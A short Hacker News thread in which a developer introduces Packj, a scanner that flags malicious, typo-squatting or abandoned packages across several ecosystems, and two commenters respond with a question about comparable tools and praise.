Hacker News new | ask | show | jobs
by ashishbijlani 1013 days ago
I've been building Packj [1] to detect dummy, malicious, abandoned, typo-squatting, and other "risky" PyPI/NPM/Ruby/PHP/Maven/Rust packages. It carries out static/dynamic/metadata analysis and scans for 40+ attributes such as num funcs/files, spawning of shell, use of SSH keys, network communication, use of decode+eval, mismatch of GitHub code vs packaged code (provenance), change in APIs across versions, etc. to flag risky packages.

1. https://github.com/ossillate-inc/packj
2 comments
thenerdhead 1011 days ago
Cool project. How do you feel about projects like OpenSSF scorecards or even the checks that socket.dev do today on these packages to help determine risk?

https://github.com/ossillate-inc/packj/blob/main/.packj.yaml

Secondly, what about impersonation where attackers imitate a popular package and its respective metadata?

link
ashishbijlani 1011 days ago
Thanks! We need more such efforts to improve supply-chain security of open-source software.

Packj detects typo-squatting (impersonation) as well.

link
siddheshgunjal 1013 days ago
This is interesting! Implementing it today itself for my open source package development pipeline!
link